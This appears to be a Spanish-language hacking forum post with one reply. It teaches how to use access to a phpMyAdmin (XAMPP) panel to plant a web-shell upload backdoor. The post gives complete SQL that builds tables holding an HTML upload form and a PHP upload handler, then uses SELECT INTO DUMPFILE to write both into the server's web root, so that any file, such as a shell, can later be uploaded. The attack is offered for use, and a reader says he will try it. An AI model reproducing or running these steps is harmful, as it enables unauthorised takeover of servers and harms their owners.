Subir shell desde phpmyadmin (xampp)

Iniciado por Decode, Julio 09, 2015, 03:29:07 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 09, 2015, 03:29:07 PM Ultima modificación: Julio 17, 2018, 05:19:01 PM por Decode
Hola gente, aquí les vengo a enseñar como subir una shell desde phpmyadmin:

1- Lo primero que debemos hacer es tener acceso al phpmyadmin.
2- Luego crear una base de datos dentro del phpmyadmin con el nombre que quieran.
3- Luego de que la base de datos este creada nos vamos a SQL y empezamos a poner los siguientes códigos:

El primero es este:

Código: php
CREATE TABLE `NOMBRE DE LA DB`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;


Luego de haber hecho esto debemos dar a continuar y poner un nuevo código, que es este:

Código: php
CREATE TABLE `NOMBRE DE LA DB`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;


Luego de haber hecho este segundo paso insertamos el nuevo código con los mismos pasos anteriores, que es este:

Código: php
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Upload</title>
</head>
<body bgcolor="black">
<div style=" color:white;text-align:center; margin-top:60px; font-size:25px;
">Upload</div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>');


Luego de haber insertado el tercer código nos vamos a lo siguiente:

Código: php
select * into dumpfile 'C:/xampp/htdocs/form.php' from userform


Luego de haber hecho este paso insertaremos el siguiente código con los mismos pasos anteriores:

Código: php
INSERT INTO user_upload
VALUES (
"<?php $uploaddir = 'C:/xampp/htdocs/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if

(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=black></br></br><div

align=center><font size=5 color=white>File uploaded successfully</font></body>'; } else { print '<body

bgcolor=black></br></br><div align=center><font size=5 color=red>Error when uploading the file</font></body>'; } ?> "
)


Ya hecho este penúltimo paso nos vamos al último código que nos dará el privilegio de subir la shell al directorio principal del servidor:

Código: php
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload


Ya terminado todos estos pasos tendremos el privilegio de subir shell al directorio principal y tener acceso al servidor o host. Para dirigirnos al upload debemos ir a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y así podremos subir la shell.

Saludos.

Interesante BRO!

andaba buscando algo así, lo probaré y les cuento como me va.



Saludos!
Nivel 77 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta